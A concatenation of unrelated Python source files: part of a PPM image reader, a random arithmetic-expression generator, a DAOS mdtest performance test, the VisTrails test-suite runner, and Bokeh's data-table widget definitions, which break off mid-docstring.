:param stream file: infile with the position set at start of data
:param int width:
:param int height:
:param int max_colors: color space of file
:param bitmap: displayio.Bitmap class
:param palette: displayio.Palette class
:return tuple:
"""
palette_colors = set()
data_start = file.tell()
for triplet in read_three_colors(file):
palette_colors.add(triplet)
if palette:
palette = palette(len(palette_colors))
for counter, color in enumerate(palette_colors):
palette[counter] = color
if bitmap:
file.seek(data_start)
bitmap = bitmap(width, height, len(palette_colors))
palette_colors = list(palette_colors)
for y in range(height):
for x in range(width):
for color in read_three_colors(file):
bitmap[x, y] = palette_colors.index(color)
break # exit the inner generator
return bitmap, palette
def read_three_colors(file):
"""
Generator to read integer values from file, in groups of three.
Each value can be len 1-3, for values 0 - 255, space padded.
:return tuple[int]:
"""
triplet = []
color = bytearray()
while True:
this_byte = file.read(1)
if this_byte.isdigit():
color += this_byte
# not a digit means we completed one number (found a space separator or EOF)
elif color or (triplet and this_byte == b""):
triplet.append(int("".join(["%c" % char for char in color])))
color = bytearray()
if len(triplet) == 3: # completed one pixel
yield bytes(tuple(triplet))
triplet = []
# short circuit must be after all other cases, so we yield the last pixel before returning
if this_byte == b"":
return
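# Illustrative usage (not part of the original module; assumes an ASCII PPM
# pixel stream held in memory):
#
#     import io
#     for pixel in read_three_colors(io.BytesIO(b"255 0 0 0 255 0")):
#         print(pixel)  # b'\xff\x00\x00', then b'\x00\xff\x00'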
|
py | b40400d0dfe8f574445524ffc0d745ea4f2aaaf6 | import random
from mathexpr import AddOperation, SubOperation, MulOperation, DivOperation,\
Constant, EvalContext
_OPERATIONS = (AddOperation, SubOperation, MulOperation, DivOperation)
def _generate_branch(rem_depth, const_range=(-5, 5)):
if rem_depth <= 0:
return None
if rem_depth == 1:
return Constant(random.randint(*const_range))
else:
new_rem_depth = rem_depth - 1
left = _generate_branch(new_rem_depth)
right = _generate_branch(new_rem_depth)
operation = random.choice(_OPERATIONS)(left, right)
return operation
def generate_expressions(count, depth):
for _ in range(count):
done = False
while not done:
expr = _generate_branch(depth)
try:
expr.eval()
except (ZeroDivisionError, OverflowError):
pass
else:
done = True
yield expr
if __name__ == '__main__':
context = EvalContext(dec_places=0, n_spaces=1)
n_expressions = 10
depth = 5
for expr in generate_expressions(n_expressions, depth):
print(f'{expr.as_str(context)} = {expr.eval(context)}')
|
py | b4040368b1ab1a7b6aba5add08a3d63e601bb68c | #!/usr/bin/python
'''
(C) Copyright 2019-2021 Intel Corporation.
SPDX-License-Identifier: BSD-2-Clause-Patent
'''
from mdtest_test_base import MdtestBase
class MdtestLarge(MdtestBase):
# pylint: disable=too-many-ancestors
"""
Class for mdtest with large configurations
:avocado: recursive
"""
def test_mdtest_large(self):
"""
Jira ID: DAOS-2494
Test Description:
Test Mdtest for large config.
Use Cases:
Aim of this test is to test different combinations
of following configs for performance purpose:
Servers: 1 | 8
Clients: 1 | 64 | 128
num of files/dirs: 10000
iter: 3
with/without unique working dir for each task
write bytes: 0 | 1K | 32K
read bytes: 0 | 1K | 32K
depth of hierarchical directory structure: 0 | 100
:avocado: tags=all
:avocado: tags=hw
:avocado: tags=perf,nvme,mdtest,checksum
:avocado: tags=mdtestlarge
"""
mdtest_flags = self.params.get("flags", "/run/mdtest/*")
self.mdtest_cmd.flags.update(mdtest_flags)
self.execute_mdtest()
|
py | b4040481f38ec6c33e94661eeab32de6d2dddde8 | #!/usr/bin/env python
# pragma: no testimport
###############################################################################
##
## Copyright (C) 2011-2014, NYU-Poly.
## Copyright (C) 2006-2011, University of Utah.
## All rights reserved.
## Contact: [email protected]
##
## This file is part of VisTrails.
##
## "Redistribution and use in source and binary forms, with or without
## modification, are permitted provided that the following conditions are met:
##
## - Redistributions of source code must retain the above copyright notice,
## this list of conditions and the following disclaimer.
## - Redistributions in binary form must reproduce the above copyright
## notice, this list of conditions and the following disclaimer in the
## documentation and/or other materials provided with the distribution.
## - Neither the name of the University of Utah nor the names of its
## contributors may be used to endorse or promote products derived from
## this software without specific prior written permission.
##
## THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS"
## AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO,
## THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR
## PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT HOLDER OR
## CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL,
## EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO,
## PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS;
## OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY,
## WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR
## OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF
## ADVISED OF THE POSSIBILITY OF SUCH DAMAGE."
##
###############################################################################
"""Runs all tests available in VisTrails modules by importing all of
them, stealing the classes that look like unit tests, and running
all of them.
runtestsuite.py also reports all VisTrails modules that don't export
any unit tests, as a crude measure of code coverage.
"""
import atexit
from distutils.version import LooseVersion
#import doctest
import locale
import os
import sys
import traceback
import os.path
import optparse
from optparse import OptionParser
import platform
import re
import shutil
import tempfile
# Makes sure we can import modules as if we were running VisTrails
# from the root directory
_this_dir = os.path.dirname(os.path.realpath(__file__))
root_directory = os.path.realpath(os.path.join(_this_dir, '..'))
sys.path.insert(0, os.path.realpath(os.path.join(root_directory, '..')))
# Use a different temporary directory
test_temp_dir = tempfile.mkdtemp(prefix='vt_testsuite_')
tempfile.tempdir = test_temp_dir
@apply
class clean_tempdir(object):
def __init__(self):
atexit.register(self.clean)
self.listdir = os.listdir
self.isdir = os.path.isdir
self.test_temp_dir = test_temp_dir
self.rmtree = shutil.rmtree
self.out = sys.stdout.write
def clean(self):
nb_dirs = 0
nb_files = 0
for f in self.listdir(self.test_temp_dir):
if self.isdir(f):
nb_dirs += 1
else:
nb_files += 1
if nb_dirs > 0 or nb_files > 0:
self.out("Warning: %d dirs and %d files were left behind in "
"tempdir, cleaning up\n" % (nb_dirs, nb_files))
self.rmtree(self.test_temp_dir, ignore_errors=True)
def setNewPyQtAPI():
try:
import sip
# We now use the new PyQt API - IPython needs it
sip.setapi('QString', 2)
sip.setapi('QVariant', 2)
except Exception:
print "Could not set PyQt API, is PyQt4 installed?"
setNewPyQtAPI()
import vistrails.tests
import vistrails.core
import vistrails.core.db.io
import vistrails.core.db.locator
from vistrails.core import debug
import vistrails.gui.application
from vistrails.core.system import vistrails_root_directory, \
vistrails_examples_directory
# VisTrails does funny stuff with unittest/unittest2, be sure to load that
# after vistrails
import unittest
###############################################################################
# Testing Examples
EXAMPLES_PATH = vistrails_examples_directory()
#dictionary of examples that will be run with the workflows that will be ignored
VT_EXAMPLES = { 'EMBOSS_webservices.vt': ["ProphetOutput"],
'KEGGPathway.vt': [],
'KEGG_SearchEntities_webservice.vt': [],
'KEGG_webservices.vt': [],
'brain_vistrail.vt': [],
'chebi_webservice.vt': [],
'head.vt': [],
'infovis.vt': [],
'noaa_webservices.vt': [],
'offscreen.vt': [],
'plot.vt': [],
'spx.vt': [],
'structure_or_id_webservice.vt': [],
'terminator.vt': ["Isosurface Script"],
'triangle_area.vt': [],
'vtk.vt': [],
'vtk_book_3rd_p189.vt': ["quadric", "SmapleFunction",
"Almost there"],
'vtk_book_3rd_p193.vt': ["modules", "connections",
"lookup table"],
'vtk_http.vt': [],
}
###############################################################################
# Utility
def sub_print(s, overline=False):
"""Prints line with underline (and optionally overline) ASCII dashes."""
if overline:
print "-" * len(s)
print s
print "-" * len(s)
###############################################################################
usage = "Usage: %prog [options] [module1 module2 ...]"
parser = OptionParser(usage=usage)
parser.add_option("-V", "--verbose", action="store", type="int",
default=0, dest="verbose",
help="set verboseness level(0--2, default=0, "
"higher means more verbose)")
parser.add_option("-e", "--examples", action="store_true",
default=False,
help="run vistrails examples")
parser.add_option("-i", "--images", action="store_true",
default=False,
help="perform image comparisons")
parser.add_option("--installbundles", action='store_true',
default=False,
help=("Attempt to install missing Python packages "
"automatically"))
parser.add_option("-S", "--startup", action="store", type="str", default=None,
dest="dotVistrails",
help="Set startup file (default is temporary directory)")
parser.add_option('-L', '--locale', action='store', type='str', default='',
dest='locale',
help="set locale to this string")
parser.add_option('-D', '--debug', action='store_true',
default=False,
help="start interactive debugger on unexpected error")
(options, args) = parser.parse_args()
# remove empty strings
args = filter(len, args)
verbose = options.verbose
locale.setlocale(locale.LC_ALL, options.locale or '')
test_examples = options.examples
test_images = options.images
installbundles = options.installbundles
dotVistrails = options.dotVistrails
debug_mode = options.debug
test_modules = None
if len(args) > 0:
test_modules = args
elif os.path.exists(EXAMPLES_PATH):
test_images = True
def module_filter(name):
if test_modules is None:
return True
for mod in test_modules:
if name.startswith(mod):
return True
return False
###############################################################################
# reinitializing arguments and options so VisTrails does not try parsing them
sys.argv = sys.argv[:1]
# creates the app so that testing can happen
# We need the windows so we can test events, etc.
optionsDict = {
'interactiveMode': True,
'nologger': True,
'singleInstance': False,
'fixedSpreadsheetCells': True,
'installBundles': installbundles,
'enablePackagesSilently': True,
'handlerDontAsk': True,
'developperDebugger': debug_mode,
}
if dotVistrails:
optionsDict['dotVistrails'] = dotVistrails
else:
optionsDict['spawned'] = True
v = vistrails.gui.application.start_application(optionsDict)
if v != 0:
app = vistrails.gui.application.get_vistrails_application()
if app:
app.finishSession()
sys.exit(v)
# disable first vistrail
app = vistrails.gui.application.get_vistrails_application()
app.builderWindow.auto_view = False
app.builderWindow.close_all_vistrails(True)
print "Test Suite for VisTrails"
print "Locale settings: %s" % ', '.join('%s: %s' % (s, locale.setlocale(getattr(locale, s), None)) for s in ('LC_ALL', 'LC_TIME'))
print "Running on %s" % ', '.join(platform.uname())
print "Python is %s" % sys.version
try:
from PyQt4 import QtCore
print "Using PyQt4 %s with Qt %s" % (QtCore.PYQT_VERSION_STR, QtCore.qVersion())
except ImportError:
print "PyQt4 not available"
for pkg in ('numpy', 'scipy', 'matplotlib'):
try:
ipkg = __import__(pkg, globals(), locals(), [], -1)
print "Using %s %s" % (pkg, ipkg.__version__)
except ImportError:
print "%s not available" % pkg
try:
import vtk
print "Using vtk %s" % vtk.vtkVersion().GetVTKVersion()
except ImportError:
print "vtk not available"
print ""
tests_passed = True
main_test_suite = unittest.TestSuite()
test_loader = unittest.TestLoader()
import_skip_regex = re.compile(r'(?i)# *pragma[: ]*no *testimport')
if test_modules:
sub_print("Trying to import some of the modules")
else:
sub_print("Trying to import all modules")
for (p, subdirs, files) in os.walk(root_directory):
# skip subversion subdirectories
if p.find('.svn') != -1 or p.find('.git') != -1 :
continue
for filename in files:
# skip files that don't look like VisTrails python modules
if not filename.endswith('.py'):
continue
module_file = os.path.join(p, filename)
module = os.path.join("vistrails", p[len(root_directory)+1:],
filename[:-3])
if (module.startswith(os.sep) or
('#' in module)):
continue
# use qualified import names with periods instead of
# slashes to avoid duplicates in sys.modules
module = module.replace('/','.')
module = module.replace('\\','.')
if module.endswith('__init__'):
module = module[:-9]
if not module_filter(module):
continue
if module.startswith('vistrails.tests.resources'):
continue
if ('.system.' in module and not
module.endswith('__init__')):
continue
with open(module_file) as fp:
l = fp.readline()
if l.startswith('#!'): # shebang
l = fp.readline()
if import_skip_regex.match(l):
if verbose >= 1:
print >>sys.stderr, ("Skipping %s, not an importable "
"module" % module)
continue
m = None
try:
if '.' in module:
m = __import__(module, globals(), locals(), ['foo'])
else:
m = __import__(module)
except BaseException:
print >>sys.stderr, "ERROR: Could not import module: %s" % module
if verbose >= 1:
traceback.print_exc(file=sys.stderr)
continue
# Load the unittest TestCases
suite = test_loader.loadTestsFromModule(m)
# Load the doctests
#try:
# suite.addTests(doctest.DocTestSuite(m))
#except ValueError:
# pass # No doctest is fine, we check that some tests exist later
# The doctests are currently opt-in; a load_tests method can be
# defined to build a DocTestSuite
# This is because some modules have interpreter-formatted examples that
# are NOT doctests, and because mining the codebase for doctests is
# painfully slow
main_test_suite.addTests(suite)
if suite.countTestCases() == 0 and verbose >= 1:
print >>sys.stderr, "WARNING: module has no tests: %s" % module
elif verbose >= 2:
print >>sys.stderr, "OK: module as %d test cases: %s" % (
suite.countTestCases(),
module)
sub_print("Imported modules. Running %d tests%s..." % (
main_test_suite.countTestCases(),
", and thumbnails comparison" if test_images else ''),
overline=True)
############## TEST VISTRAIL IMAGES ####################
# Compares thumbnails with the generated images to detect broken visualizations
image_tests = [("terminator.vt", [("terminator_isosurface", "Isosurface"),
("terminator_VRSW", "Volume Rendering SW"),
("terminator_CPSW", "Clipping Plane SW"),
("terminator_CRSW", "Combined Rendering SW"),
("terminator_ISSW", "Image Slices SW")])
]
compare_use_vtk = False
try:
import vtk
if LooseVersion(vtk.vtkVersion().GetVTKVersion()) >= LooseVersion('5.8.0'):
compare_use_vtk = True
except ImportError:
pass
if compare_use_vtk:
def compare_thumbnails(prev, next):
#vtkImageDifference assumes RGB, so strip alpha
def removeAlpha(file):
freader = vtk.vtkPNGReader()
freader.SetFileName(file)
removealpha = vtk.vtkImageExtractComponents()
removealpha.SetComponents(0,1,2)
removealpha.SetInputConnection(freader.GetOutputPort())
removealpha.Update()
return removealpha.GetOutput()
#do the image comparison
a = removeAlpha(prev)
b = removeAlpha(next)
idiff = vtk.vtkImageDifference()
idiff.SetInput(a)
idiff.SetImage(b)
idiff.Update()
return idiff.GetThresholdedError()
else:
try:
from scipy.misc import imread
except ImportError:
imread = None
if test_images:
print "Warning: old VTK version detected, NOT comparing thumbnails"
if imread is not None:
def compare_thumbnails(prev, next):
prev_img = imread(prev)
next_img = imread(next)
assert len(prev_img.shape) == 3
assert len(next_img.shape) == 3
if prev_img.shape[:2] == next_img.shape[:2]:
return 0
else:
return float('Inf')
else:
def compare_thumbnails(prev, next):
if os.path.isfile(prev) and os.path.isfile(next):
return 0
else:
return float('Inf')
def image_test_generator(vtfile, version):
from vistrails.core.db.locator import FileLocator
from vistrails.core.db.io import load_vistrail
import vistrails.core.console_mode
def test(self):
try:
errs = []
filename = os.path.join(EXAMPLES_PATH, vtfile)
locator = FileLocator(os.path.abspath(filename))
(v, abstractions, thumbnails, mashups) = load_vistrail(locator)
errs = vistrails.core.console_mode.run(
[(locator, version)],
update_vistrail=False,
extra_info={'compare_thumbnails': compare_thumbnails})
if len(errs) > 0:
for err in errs:
print(" *** Error in %s:%s:%s -- %s" % err)
self.fail(str(err))
except Exception, e:
self.fail(debug.format_exception(e))
return test
class TestVistrailImages(unittest.TestCase):
pass
if test_images:
for vt, t in image_tests:
for name, version in t:
test_name = 'test_%s' % name
test = image_test_generator(vt, version)
setattr(TestVistrailImages, test_name, test)
main_test_suite.addTest(TestVistrailImages(test_name))
############## RUN TEST SUITE ####################
class TestResult(unittest.TextTestResult):
def addSkip(self, test, reason):
self.stream.writeln("skipped '{0}': {1}".format(str(test), reason))
super(TestResult, self).addSkip(test, reason)
runner = unittest.TextTestRunner(
verbosity=max(verbose, 1),
resultclass=TestResult)
result = runner.run(main_test_suite)
if not result.wasSuccessful():
tests_passed = False
sub_print("Tests finished.", overline=True)
if test_examples:
import vistrails.core.console_mode
sub_print("Testing examples:")
summary = {}
nworkflows = 0
nvtfiles = 0
for vtfile in VT_EXAMPLES.keys():
try:
errs = []
filename = os.path.join(EXAMPLES_PATH,
vtfile)
print filename
locator = vistrails.core.db.locator.FileLocator(os.path.abspath(filename))
(v, abstractions, thumbnails, mashups) = vistrails.core.db.io.load_vistrail(locator)
w_list = []
for version,tag in v.get_tagMap().iteritems():
if tag not in VT_EXAMPLES[vtfile]:
w_list.append((locator,version))
nworkflows += 1
if len(w_list) > 0:
errs = vistrails.core.console_mode.run(w_list, update_vistrail=False)
summary[vtfile] = errs
except Exception, e:
errs.append((vtfile,"None", "None", debug.format_exception(e)))
summary[vtfile] = errs
nvtfiles += 1
print "-" * 79
print "Summary of Examples: %s workflows in %s vistrail files" % (
nworkflows, nvtfiles)
print ""
errors = False
for vtfile, errs in summary.iteritems():
print vtfile
if len(errs) > 0:
for err in errs:
print(" *** Error in %s:%s:%s -- %s" % err)
errors = True
else:
print " Ok."
print "-" * 79
if errors:
tests_passed = False
sub_print("There were errors. See summary for more information")
else:
sub_print("Examples ran successfully.")
vistrails.gui.application.get_vistrails_application().finishSession()
vistrails.gui.application.stop_application()
# Test Runners can use the return value to know if the tests passed
sys.exit(0 if tests_passed else 1)
|
py | b40406afc756f1a14260a691f1d90e34974859f4 | #-----------------------------------------------------------------------------
# Copyright (c) 2012 - 2019, Anaconda, Inc., and Bokeh Contributors.
# All rights reserved.
#
# The full license is in the file LICENSE.txt, distributed with this software.
#-----------------------------------------------------------------------------
''' Various kinds of data table (data grid) widgets.
'''
#-----------------------------------------------------------------------------
# Boilerplate
#-----------------------------------------------------------------------------
import logging # isort:skip
log = logging.getLogger(__name__)
#-----------------------------------------------------------------------------
# Imports
#-----------------------------------------------------------------------------
# Bokeh imports
from ...core.enums import (
DateFormat,
FontStyle,
NumeralLanguage,
RoundingFunction,
TextAlign,
)
from ...core.has_props import abstract
from ...core.properties import (
Bool,
Color,
Either,
Enum,
Float,
Instance,
Int,
List,
Override,
Seq,
String,
)
from ...model import Model
from ..sources import CDSView, DataSource
from .widget import Widget
#-----------------------------------------------------------------------------
# Globals and constants
#-----------------------------------------------------------------------------
__all__ = (
'AvgAggregator',
'BooleanFormatter',
'CellFormatter',
'CellEditor',
'CheckboxEditor',
'CompositeFormatter',
'DataCube',
'DataTable',
'DateEditor',
'DateFormatter',
'GroupingInfo',
'HTMLTemplateFormatter',
'IntEditor',
'MaxAggregator',
'MinAggregator',
'NumberEditor',
'NumberFormatter',
'PercentEditor',
'ScientificFormatter',
'SelectEditor',
'StringEditor',
'StringFormatter',
'SumAggregator',
'TableColumn',
'TableWidget',
'TextEditor',
'TimeEditor',
)
#-----------------------------------------------------------------------------
# Dev API
#-----------------------------------------------------------------------------
@abstract
class CellFormatter(Model):
''' Abstract base class for data table's cell formatters.
'''
@abstract
class CellEditor(Model):
''' Abstract base class for data table's cell editors.
'''
@abstract
class RowAggregator(Model):
''' Abstract base class for data cube's row formatters.
'''
field_ = String('', help="""
Refers to the table column being aggregated
""")
#-----------------------------------------------------------------------------
# General API
#-----------------------------------------------------------------------------
class StringFormatter(CellFormatter):
''' Basic string cell formatter.
'''
font_style = Enum(FontStyle, default="normal", help="""
An optional text font style, e.g. bold, italic.
""")
text_align = Enum(TextAlign, default="left", help="""
An optional text align, i.e. left, center or right.
""")
text_color = Color(help="""
An optional text color. See :class:`bokeh.core.properties.Color` for
details.
""")
class ScientificFormatter(StringFormatter):
''' Display numeric values from continuous ranges as "basic numbers",
using scientific notation when appropriate by default.
'''
precision = Int(10, help="""
How many digits of precision to display.
""")
power_limit_high = Int(5, help="""
Limit the use of scientific notation to when::
log(x) >= power_limit_high
""")
power_limit_low = Int(-3, help="""
Limit the use of scientific notation to when::
log(x) <= power_limit_low
""")
class NumberFormatter(StringFormatter):
''' Number cell formatter.
'''
format = String("0,0", help="""
The number format, as defined in the following tables:
**NUMBERS**:
============ ============== ===============
Number Format String
============ ============== ===============
10000 '0,0.0000' 10,000.0000
10000.23 '0,0' 10,000
10000.23 '+0,0' +10,000
-10000 '0,0.0' -10,000.0
10000.1234 '0.000' 10000.123
10000.1234 '0[.]00000' 10000.12340
-10000 '(0,0.0000)' (10,000.0000)
-0.23 '.00' -.23
-0.23 '(.00)' (.23)
0.23 '0.00000' 0.23000
0.23 '0.0[0000]' 0.23
1230974 '0.0a' 1.2m
1460 '0 a' 1 k
-104000 '0a' -104k
1 '0o' 1st
52 '0o' 52nd
23 '0o' 23rd
100 '0o' 100th
============ ============== ===============
**CURRENCY**:
=========== =============== =============
Number Format String
=========== =============== =============
1000.234 '$0,0.00' $1,000.23
1000.2 '0,0[.]00 $' 1,000.20 $
1001 '$ 0,0[.]00' $ 1,001
-1000.234 '($0,0)' ($1,000)
-1000.234 '$0.00' -$1000.23
1230974 '($ 0.00 a)' $ 1.23 m
=========== =============== =============
**BYTES**:
=============== =========== ============
Number Format String
=============== =========== ============
100 '0b' 100B
2048 '0 b' 2 KB
7884486213 '0.0b' 7.3GB
3467479682787 '0.000 b' 3.154 TB
=============== =========== ============
**PERCENTAGES**:
============= ============= ===========
Number Format String
============= ============= ===========
1 '0%' 100%
0.974878234 '0.000%' 97.488%
-0.43 '0 %' -43 %
0.43 '(0.000 %)' 43.000 %
============= ============= ===========
**TIME**:
============ ============== ============
Number Format String
============ ============== ============
25 '00:00:00' 0:00:25
238 '00:00:00' 0:03:58
63846 '00:00:00' 17:44:06
============ ============== ============
For the complete specification, see http://numbrojs.com/format.html
""")
language = Enum(NumeralLanguage, default="en", help="""
The language to use for formatting language-specific features (e.g. thousands separator).
""")
rounding = Enum(RoundingFunction, help="""
Rounding functions (round, floor, ceil) and their synonyms (nearest, rounddown, roundup).
""")
class BooleanFormatter(CellFormatter):
''' Boolean (check mark) cell formatter.
'''
icon = Enum('check', 'check-circle', 'check-circle-o', 'check-square', 'check-square-o', help="""
The icon visualizing the check mark.
""")
class CompositeFormatter(CellFormatter):
'''CompositeFormatter applies multiple formatters to a single TableColumn
Example:
.. code-block:: python
example_formatter = CompositeFormatter(formatters=[StringFormatter(font_style="bold"), HTMLTemplateFormatter(
template='<code><%= value %></code>')])
TableColumn(field='Part ID', title='Part ID', formatter=example_formatter, ...)
'''
formatters = Seq(Instance(CellFormatter, help="""
The CompositeFormatter class may be used with any combination of
the installed formatters in the Bokeh library to apply multiple
    formatting capabilities (BooleanFormatter, CellFormatter, DateFormatter,
    HTMLTemplateFormatter, NumberFormatter, ScientificFormatter, StringFormatter)
    to a single TableColumn. Formatters are applied in the same order they appear
    in the sequence.
"""))
class DateFormatter(CellFormatter):
''' Date cell formatter.
'''
format = Either(Enum(DateFormat), String, default='ISO-8601', help="""
The date format can be any standard `strftime`_ format string, as well
as any of the following predefined format names:
================================================ ================== ===================
Format name(s) Format string Example Output
================================================ ================== ===================
``ATOM`` / ``W3C`` / ``RFC-3339`` / ``ISO-8601`` ``"%Y-%m-%d"`` 2014-03-01
``COOKIE`` ``"%a, %d %b %Y"`` Sat, 01 Mar 2014
``RFC-850`` ``"%A, %d-%b-%y"`` Saturday, 01-Mar-14
``RFC-1123`` / ``RFC-2822`` ``"%a, %e %b %Y"`` Sat, 1 Mar 2014
``RSS`` / ``RFC-822`` / ``RFC-1036`` ``"%a, %e %b %y"`` Sat, 1 Mar 14
``TIMESTAMP`` (ms since epoch) 1393632000000
================================================ ================== ===================
Note that in the table some of the format names are synonymous, with
identical format names separated by slashes.
This list of supported `strftime`_ format codes is reproduced below.
%a
The abbreviated name of the day of the week according to the
current locale.
%A
The full name of the day of the week according to the current
locale.
%b
The abbreviated month name according to the current locale.
%B
The full month name according to the current locale.
%c
The preferred date and time representation for the current
locale.
%C
The century number (year/100) as a 2-digit integer.
%d
The day of the month as a decimal number (range 01 to 31).
%D
Equivalent to %m/%d/%y. (Americans should note that in many
other countries %d/%m/%y is rather common. This means that in
international context this format is ambiguous and should not
be used.)
%e
Like %d, the day of the month as a decimal number, but a
leading zero is replaced by a space.
%f
Microsecond as a decimal number, zero-padded on the left (range
000000-999999). This is an extension to the set of directives
available to `timezone`_.
%F
Equivalent to %Y-%m-%d (the ISO 8601 date format).
%G
The ISO 8601 week-based year with century as a decimal number.
The 4-digit year corresponding to the ISO week number (see %V).
This has the same format and value as %Y, except that if the
ISO week number belongs to the previous or next year, that year
is used instead.
%g
Like %G, but without century, that is, with a 2-digit year (00-99).
%h
Equivalent to %b.
%H
The hour as a decimal number using a 24-hour clock (range 00
to 23).
%I
The hour as a decimal number using a 12-hour clock (range 01
to 12).
%j
The day of the year as a decimal number (range 001 to 366).
%k
The hour (24-hour clock) as a decimal number (range 0 to 23).
Single digits are preceded by a blank. (See also %H.)
%l
The hour (12-hour clock) as a decimal number (range 1 to 12).
Single digits are preceded by a blank. (See also %I.) (TZ)
%m
The month as a decimal number (range 01 to 12).
%M
The minute as a decimal number (range 00 to 59).
%n
A newline character. Bokeh text does not currently support
newline characters.
%N
Nanosecond as a decimal number, zero-padded on the left (range
000000000-999999999). Supports a padding width specifier, i.e.
%3N displays 3 leftmost digits. However, this is only accurate
to the millisecond level of precision due to limitations of
`timezone`_.
%p
Either "AM" or "PM" according to the given time value, or the
corresponding strings for the current locale. Noon is treated
as "PM" and midnight as "AM".
%P
Like %p but in lowercase: "am" or "pm" or a corresponding
string for the current locale.
%r
The time in a.m. or p.m. notation. In the POSIX locale this
is equivalent to %I:%M:%S %p.
%R
The time in 24-hour notation (%H:%M). For a version including
the seconds, see %T below.
%s
The number of seconds since the Epoch, 1970-01-01 00:00:00
+0000 (UTC).
%S
The second as a decimal number (range 00 to 60). (The range
is up to 60 to allow for occasional leap seconds.)
%t
A tab character. Bokeh text does not currently support tab
characters.
%T
The time in 24-hour notation (%H:%M:%S).
%u
The day of the week as a decimal, range 1 to 7, Monday being 1.
See also %w.
%U
The week number of the current year as a decimal number, range
00 to 53, starting with the first Sunday as the first day of
week 01. See also %V and %W.
%V
The ISO 8601 week number (see NOTES) of the current year as a
decimal number, range 01 to 53, where week 1 is the first week
that has at least 4 days in the new year. See also %U and %W.
%w
The day of the week as a decimal, range 0 to 6, Sunday being 0.
See also %u.
%W
The week number of the current year as a decimal number, range
00 to 53, starting with the first Monday as the first day of
week 01.
%x
The preferred date representation for the current locale
without the time.
%X
The preferred time representation for the current locale
without the date.
%y
The year as a decimal number without a century (range 00 to 99).
%Y
The year as a decimal number including the century.
%z
The +hhmm or -hhmm numeric timezone (that is, the hour and
minute offset from UTC).
%Z
The timezone name or abbreviation.
%%
A literal '%' character.
.. warning::
The client library BokehJS uses the `timezone`_ library to
format datetimes. The inclusion of the list below is based on the
claim that `timezone`_ makes to support "the full compliment
of GNU date format specifiers." However, this claim has not
been tested exhaustively against this list. If you find formats
that do not function as expected, please submit a `github issue`_,
so that the documentation can be updated appropriately.
.. _strftime: http://man7.org/linux/man-pages/man3/strftime.3.html
.. _timezone: http://bigeasy.github.io/timezone/
.. _github issue: https://github.com/bokeh/bokeh/issues
""")
class HTMLTemplateFormatter(CellFormatter):
''' HTML formatter using a template.
This uses Underscore's `template` method and syntax. http://underscorejs.org/#template
The formatter has access other items in the row via the `dataContext` object passed to the formatter.
So, for example, if another column in the datasource was named `url`, the template could access it as:
.. code-block:: jinja
<a href="<%= url %>"><%= value %></a>
    To use a different set of template delimiters, pass the appropriate values for `evaluate`, `interpolate`,
or `escape`. See the Underscore `template` documentation for more information. http://underscorejs.org/#template
Example: Simple HTML template to format the column value as code.
.. code-block:: python
HTMLTemplateFormatter(template='<code><%= value %></code>')
Example: Use values from other columns (`manufacturer` and `model`) to build a hyperlink.
.. code-block:: python
HTMLTemplateFormatter(template=
'<a href="https:/www.google.com/search?q=<%= manufacturer %>+<%= model %>" target="_blank"><%= value %></a>'
)
'''
template = String('<%= value %>', help="""
Template string to be used by Underscore's template method.
""")
class StringEditor(CellEditor):
''' Basic string cell editor with auto-completion.
'''
completions = List(String, help="""
An optional list of completion strings.
""")
class TextEditor(CellEditor):
''' Multi-line string cell editor.
'''
class SelectEditor(CellEditor):
''' Select cell editor.
'''
options = List(String, help="""
The list of options to select from.
""")
class PercentEditor(CellEditor):
''' ``IntEditor`` optimized for editing percentages.
'''
class CheckboxEditor(CellEditor):
''' Boolean value cell editor.
'''
class IntEditor(CellEditor):
''' Spinner-based integer cell editor.
'''
step = Int(1, help="""
The major step value.
""")
class NumberEditor(CellEditor):
''' Spinner-based number cell editor.
'''
step = Float(0.01, help="""
The major step value.
""")
class TimeEditor(CellEditor):
''' Spinner-based time cell editor.
'''
class DateEditor(CellEditor):
''' Calendar-based date cell editor.
'''
class AvgAggregator(RowAggregator):
''' Simple average across multiple rows.
'''
class MinAggregator(RowAggregator):
''' Smallest value across multiple rows.
'''
class MaxAggregator(RowAggregator):
''' Largest value across multiple rows.
'''
class SumAggregator(RowAggregator):
''' Simple sum across multiple rows.
'''
class TableColumn(Model):
''' Table column widget.
'''
field = String(help="""
The name of the field mapping to a column in the data source.
""")
title = String(help="""
The title of this column. If not set, column's data field is
used instead.
""")
width = Int(300, help="""
The width or maximum width (depending on data table's configuration)
in pixels of this column.
""")
formatter = Instance(CellFormatter, lambda: StringFormatter(), help="""
The cell formatter for this column. By default, a simple string
formatter is used.
""")
editor = Instance(CellEditor, lambda: StringEditor(), help="""
The cell editor for this column. By default, a simple string editor
is used.
""")
sortable = Bool(True, help="""
Whether this column is sortable or not. Note that data table has
to have sorting enabled to allow sorting in general.
""")
default_sort = Enum("ascending", "descending", help="""
The default sorting order. By default ``ascending`` order is used.
""")
@abstract
class TableWidget(Widget):
''' Abstract base class for data table (data grid) widgets.
'''
source = Instance(DataSource, help="""
The source of data for the widget.
""")
view = Instance(CDSView, help="""
A view into the data source to use when rendering table rows. A default view
of the entire data source is created if a view is not passed in during
initialization.
""")
def __init__(self, **kw):
super().__init__(**kw)
if "view" not in kw:
self.view = CDSView(source=self.source)
class DataTable(TableWidget):
''' Two dimensional grid for visualisation and editing large amounts
of data.
'''
columns = List(Instance(TableColumn), help="""
The list of child column widgets.
""")
fit_columns = Bool(True, help="""
Whether columns should be fit to the available width. This results in no
horizontal scrollbar showing up, but data can get unreadable if there is
    not enough space available. If set to ``True``, columns' width is
understood as maximum width.
""")
sortable = Bool(True, help="""
    Allows sorting of the table's contents. By default natural order is preserved.
    To sort a column, click on its header. Clicking one more time changes
sort direction. Use Ctrl + click to return to natural order. Use
